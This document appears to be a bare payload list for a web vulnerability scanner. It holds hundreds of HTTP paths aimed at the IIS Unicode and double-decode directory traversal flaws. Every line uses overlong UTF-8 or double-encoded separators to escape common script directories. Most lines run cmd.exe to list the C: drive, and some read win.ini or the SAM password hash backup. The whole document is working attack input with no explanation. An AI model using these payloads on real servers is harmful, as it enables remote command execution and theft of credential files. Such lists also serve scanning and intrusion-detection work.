/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/a.asp/..%c0%2f../..%c0%2f../winnt/win.ini
/a.asp/..%c0%2f../..%c0%2f..\winnt\repair\sam._
/a.asp/..%c0%af../..%c0%af../winnt/win.ini
/a.asp/..%c0%af../..%c0%af..\winnt\repair\sam._
/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
/a.asp/..%c1%1c../..%c1%1c..\winnt\repair\sam._
/a.asp/..%c1%9c../..%c1%9c../winnt/win.ini
/a.asp/..%c1%9c../..%c1%9c..\winnt\repair\sam._
/adsamples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\
/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/scripts/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir+c:\%20C:\
/scripts/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c%20dir+c:\%20C:\/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_mem_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/a.asp/..%%35%63../..%%35%63../winnt/win.ini
/a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._
/a.asp/..%%35c../..%%35c../winnt/win.ini
/a.asp/..%%35c../..%%35c..\winnt\repair\sam._
/a.asp/..%25%35%63../..%25%35%63../winnt/win.ini
/a.asp/..%25%35%63../..%25%35%63..\winnt\repair\sam._
/a.asp/..%255c../..%255c../winnt/win.ini
/a.asp/..%255c../..%255c..\winnt\repair\sam._
/adsamples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/bin/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/exchange/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/script/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/script/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/script/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/script/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
